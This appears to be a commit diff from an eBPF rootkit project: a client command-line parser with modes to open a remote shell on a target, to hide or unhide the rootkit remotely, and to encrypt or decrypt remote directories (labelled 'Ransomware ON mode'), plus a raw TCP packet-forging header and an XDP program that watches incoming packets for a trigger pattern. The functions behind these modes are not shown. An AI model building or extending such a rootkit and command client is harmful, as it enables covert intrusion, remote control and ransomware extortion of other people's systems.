//Command line argument parsing
while ((opt = getopt(argc, argv, ":S:h")) != -1) {
switch (opt) {
case 'S':
print_welcome_message();
sleep(1);
//Send a secret message
printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n");
//printf("Option S has argument %s\n", optarg);
strcpy(dest_address, optarg);
get_shell(dest_address);
PARAM_MODULE_ACTIVATED = 1;
break;
/*case 'u':
print_welcome_message();
sleep(1);
//Selecting show rootkit - Unhide mode
printf("["KBLU"INFO"RESET"]""Selected UNHIDE the rootkit remotely\n");
//printf("Option m has argument %s\n", optarg);
strcpy(dest_address, optarg);
show_rootkit(dest_address);
PARAM_MODULE_ACTIVATED = 1;
break;
case 'i':
print_welcome_message();
sleep(1);
//Selecting hide rootkit - Invisible mode
printf("["KBLU"INFO"RESET"]""Selected HIDE the rootkit remotely\n");
//printf("Option m has argument %s\n", optarg);
strcpy(dest_address, optarg);
hide_rootkit(dest_address);
PARAM_MODULE_ACTIVATED = 1;
case 'e':
ENCRYPT_MODE_SEL = 1;
strcpy(dest_address, optarg);
break;
case 'd':
DECRYPT_MODE_SEL = 1;
strcpy(dest_address, optarg);
break;
case 'p':
PATH_ARG_PROVIDED = 1;
strcpy(path_arg, optarg);
break;*/
case 'h':
print_help_dialog(argv[0]);
exit(0);
break;
case '?':
printf("["KRED"ERROR"RESET"]""Unknown option: %c\n", optopt);
break;
case ':':
printf("["KRED"ERROR"RESET"]""Missing arguments for %c\n", optopt);
exit(EXIT_FAILURE);
break;
default:
print_help_dialog(argv[0]);
exit(EXIT_FAILURE);
}
}
//Checking activated mode, for those requiring multiple args
if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
print_welcome_message();
sleep(1);
//Selecting encrypt directory - Ransomware ON mode
printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n");
encrypt_directory(dest_address, path_arg);
}else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){
print_welcome_message();
sleep(1);
//Selecting encrypt directory - Ransomware ON mode
printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n");
decrypt_directory(dest_address, path_arg);
}else if(PARAM_MODULE_ACTIVATED==0){
printf("["KRED"ERROR"RESET"]""Invalid parameters\n");
print_help_dialog(argv[0]);
exit(EXIT_FAILURE);
}
}

BIN
src/client/client.o Normal file
View File

Binary file not shown.

BIN
src/client/injector Executable file
View File

Binary file not shown.

35
src/client/lib/RawTCP.h Normal file
View File

@@ -0,0 +1,35 @@
#ifndef HEADER_RAWTCP_LIB
#define HEADER_RAWTCP_LIB
#include <stdlib.h>
//Packet_t structure
typedef struct packet_t{
struct iphdr *ipheader;
struct tcphdr *tcpheader;
char *payload;
int payload_length;
char* packet;
}packet_t;
//PacketForger headers
packet_t build_standard_packet(
u_int16_t source_port,
u_int16_t destination_port,
const char* source_ip_address,
const char* destination_ip_address,
u_int32_t packet_length,
char* payload
);
int packet_destroy(packet_t packet);
int set_TCP_flags(packet_t packet, int hex_flags);
//SocketManager headers
int rawsocket_send(packet_t packet);
packet_t rawsocket_sniff();
#endif

BIN
src/client/lib/libRawTCP_Lib.a Normal file
View File

Binary file not shown.

2
src/ebpf/bootstrap.bpf.c
View File

@@ -1,6 +1,6 @@
// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* Copyright (c) 2020 Facebook */ /* Copyright (c) 2020 Facebook */
#include "vmlinux.h" #include "../vmlinux/vmlinux.h"
#include <bpf/bpf_helpers.h> #include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> #include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h> #include <bpf/bpf_core_read.h>

22
src/ebpf/xdp_filter.bpf.c
View File

@@ -24,19 +24,19 @@
char LICENSE[] SEC("license") = "Dual BSD/GPL"; char LICENSE[] SEC("license") = "Dual BSD/GPL";
/*//BPF map //BPF map
struct { /*struct {
__uint(type, BPF_MAP_TYPE_HASH); __uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 8192); __uint(max_entries, 8192);
__type(key, pid_t); __type(key, pid_t);
__type(value, uint64_t); __type(value, char[5]);
} exec_start SEC(".maps");*/ } exec_start SEC(".maps");*/
//Ring buffer //Ring buffer
struct { /*struct {
__uint(type, BPF_MAP_TYPE_RINGBUF); __uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 256 * 1024); __uint(max_entries, 256 * 1024);
} rb SEC(".maps"); } rb SEC(".maps");*/
//Ethernet frame struct //Ethernet frame struct
struct eth_hdr { struct eth_hdr {
@@ -45,9 +45,11 @@ struct eth_hdr {
unsigned short h_proto; unsigned short h_proto;
}; };
SEC("xdp") SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx) int xdp_receive(struct xdp_md *ctx)
{ {
bpf_printk("BPF triggered\n");
void *data_end = (void *)(long)ctx->data_end; void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data; void *data = (void *)(long)ctx->data;
char match_pattern[] = "test"; char match_pattern[] = "test";
@@ -57,10 +59,10 @@ int xdp_receive(struct xdp_md *ctx)
struct udphdr *udp; struct udphdr *udp;
struct iphdr *ip; struct iphdr *ip;
struct event *rb_event; /*struct event *rb_event;
/* Reserve a ring buffer event from BPF ringbuf to be filled later*/ Reserve a ring buffer event from BPF ringbuf to be filled later*/
/*rb_event = bpf_ringbuf_reserve(&rb, sizeof(*rb_event), 0); /*rb_event = bpf_ringbuf_reserve(&rb, sizeof(struct event), 0);
if (!rb_event) if (!rb_event)
return 0;*/ return 0;*/
@@ -92,11 +94,13 @@ int xdp_receive(struct xdp_md *ctx)
if ((void *)payload + payload_size > data_end) if ((void *)payload + payload_size > data_end)
return XDP_PASS; return XDP_PASS;
// Compare each byte, exit if a difference is found. // Compare each byte, exit if a difference is found.
for (i = 0; i < payload_size; i++) for (i = 0; i < payload_size; i++)
if (payload[i] != match_pattern[i]) if (payload[i] != match_pattern[i])
return XDP_PASS; return XDP_PASS;
bpf_printk("BPF finished\n ");
/*if(!payload){ /*if(!payload){
bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void *)payload); bpf_probe_read_str(&rb_event->payload, sizeof(rb_event->payload), (void *)payload);
bpf_ringbuf_submit(rb_event, 0); bpf_ringbuf_submit(rb_event, 0);

30
src/user/xdp_filter.c
View File

@@ -4,8 +4,10 @@
#include <signal.h> #include <signal.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <bpf/libbpf.h> #include <bpf/libbpf.h>
#include <linux/if_link.h>
#include "xdp_filter.skel.h" #include "xdp_filter.skel.h"
#include "xdp_filter.h" #include "xdp_filter.h"
#include <net/if.h>
static struct env { static struct env {
bool verbose; bool verbose;
@@ -76,7 +78,7 @@ static void sig_handler(int sig){
exiting = true; exiting = true;
} }
static int handle_event(void *ctx, void *data, size_t data_sz){ /*static int handle_event(void *ctx, void *data, size_t data_sz){
const struct event *e = data; const struct event *e = data;
struct tm *tm; struct tm *tm;
char ts[32]; char ts[32];
@@ -90,18 +92,20 @@ static int handle_event(void *ctx, void *data, size_t data_sz){
e->payload); e->payload);
return 0; return 0;
} }*/
int main(int argc, char**argv){ int main(int argc, char**argv){
struct ring_buffer *rb = NULL; //struct ring_buffer *rb = NULL;
struct xdp_filter_bpf *skel; struct xdp_filter_bpf *skel;
int err; int err;
unsigned int ifindex = if_nametoindex(argv[1]);
/* Parse command line arguments */ /* Parse command line arguments */
err = argp_parse(&argp, argc, argv, 0, NULL, NULL); /*err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
if (err) if (err)
return err; return err;*/
/* Set up libbpf errors and debug info callback */ /* Set up libbpf errors and debug info callback */
libbpf_set_print(libbpf_print_fn); libbpf_set_print(libbpf_print_fn);
@@ -134,19 +138,24 @@ int main(int argc, char**argv){
goto cleanup; goto cleanup;
} }
int flags = XDP_FLAGS_SKB_MODE;
int fd = bpf_program__fd(skel->progs.xdp_receive);
err = bpf_set_link_xdp_fd(ifindex, fd, flags);
/* Set up ring buffer polling */ /* Set up ring buffer polling */
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); /*rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
if (!rb) { if (!rb) {
err = -1; err = -1;
fprintf(stderr, "Failed to create ring buffer\n"); fprintf(stderr, "Failed to create ring buffer\n");
goto cleanup; goto cleanup;
} }*/
/* Process events */ /* Process events */
printf("%-8s %-5s %-16s %-7s %-7s %s\n", printf("%-8s %-5s %-16s %-7s %-7s %s\n",
"TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
while (!exiting) { while (!exiting) {
err = ring_buffer__poll(rb, 100 /* timeout, ms */); //err = ring_buffer__poll(rb, 100 /* timeout, ms */);
/* Ctrl-C will cause -EINTR */ /* Ctrl-C will cause -EINTR */
if (err == -EINTR) { if (err == -EINTR) {
err = 0; err = 0;
@@ -158,9 +167,12 @@ int main(int argc, char**argv){
} }
} }
fd = -1;
err = bpf_set_link_xdp_fd(ifindex, fd, flags);
cleanup: cleanup:
/* Clean up */ /* Clean up */
ring_buffer__free(rb); //ring_buffer__free(rb);
xdp_filter_bpf__destroy(skel); xdp_filter_bpf__destroy(skel);
return err < 0 ? -err : 0; return err < 0 ? -err : 0;

2
src/user/xdp_filter.h
View File

@@ -5,7 +5,7 @@
struct event { struct event {
char payload[MAX_PAYLOAD_LEN]; char payload[MAX_PAYLOAD_LEN];
bool exit_event; //bool exit_event;
}; };
#endif #endif